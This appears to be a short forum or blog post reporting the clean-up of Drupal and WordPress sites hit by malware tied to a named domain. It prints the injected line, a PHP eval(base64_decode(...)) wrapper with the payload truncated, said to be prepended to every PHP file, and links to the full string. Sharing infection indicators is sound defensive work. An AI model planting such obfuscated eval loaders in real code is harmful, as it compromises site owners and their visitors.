just cleaned-up drupal and wordpress sites infected by sweepstakesandcontestsdo.com malware/virus.
it injects:
<?php
/**/ eval(base64_decode("aWYoZnVuY3Rpb2***yk7ICB9ICB9"));
// i truncated the actual string inside base64_decode() because it's too long, but you can see it here: http://pastebin.com/Y4h7ePJf
?>at the very beginning of all your php files recursively.

Recent comments
3 weeks 3 days ago
2 years 23 weeks ago